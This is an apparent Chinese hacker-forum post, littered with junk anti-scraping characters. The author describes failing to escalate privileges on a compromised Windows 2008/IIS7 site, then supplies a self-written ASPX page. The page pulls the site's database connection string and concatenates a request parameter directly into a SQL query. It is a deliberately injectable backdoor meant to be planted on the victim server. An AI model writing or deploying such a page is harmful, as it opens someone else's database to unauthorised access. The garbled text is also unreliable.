昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
- n3 u& C! D, ~4 z$ m其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。6 u' ]# Z" i% N8 F. u
代码量不多,自己写个拉倒了。烦死了。& {. ~1 l) Z- E' q y% c. Q$ `
( ~+ {0 s8 c+ u. N9 q7 x9 A7 d; u( |9 O: n6 t4 ]+ R5 @3 m
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
9 ?. t( u0 e# l4 d<html xmlns="http://www.w3.org/1999/xhtml">
- Q, m# }1 C7 ~! |& A: \7 _0 K<head runat="server">
! z! q( z5 m+ l, c' y8 R# a <title>暗影aspx构造注射专用页面</title>
* ?6 \4 o) D# p n, p</head>) I& R5 A/ u& [8 }$ W1 p# z) c$ M
<body>" n1 S( b6 F8 ?1 E* c; j
<form id="form1" runat="server">
2 O9 {3 W3 {- ^( f0 o1 ? <div>: U7 L3 Z4 k* C3 w6 O
<script language="c#" runat="server">$ x$ E v3 L4 X- N8 C8 ^6 n _, J
. d# N& Z4 ^$ |. p& ~: @ void page_init(object sender, EventArgs e)
( s) T% g& b' G% p* G' x {1 S! B2 N: M' k- s s1 t
, n5 H# C% k- F' p8 P
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();$ O( N& Q8 O$ Q, w5 k0 S
2 X! D; l3 g% e$ A3 m conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();4 Z9 M- \1 x1 D6 j
conn.Open();% Y0 f( V$ Y( A( q( }9 ?& B# \
* o( e" N4 d/ ?, t; a, K/ h string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
3 T" M5 j5 Z! n! c. r
6 S. i, F! |6 J4 K P. m6 j System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
( I: a+ k. A7 D int x = command.ExecuteNonQuery();6 a0 _7 |, o5 T3 W" r
Response.Write(i+"\n");1 A+ P; ?/ p7 u) U! q( f
Response.Write(x);/ f; G# ]5 C% ~4 ^7 k% c) q
conn.Close();
0 O7 H. |6 p* `/ \& x" W) \ v }
& B. E- g3 l. T% D" m 4 A4 G, V8 m; r1 [
</script>
& t/ x, z3 I+ v- }, }) n </div>7 g% t$ ], S+ N* a( f1 `# b
</form>- o1 e" q, a- i; t' Z- e( w
</body>
$ v- \6 k/ x' N2 ^/ P8 o4 @6 G</html>! v3 i( P8 F+ `. t, t; [' e4 V4 j
|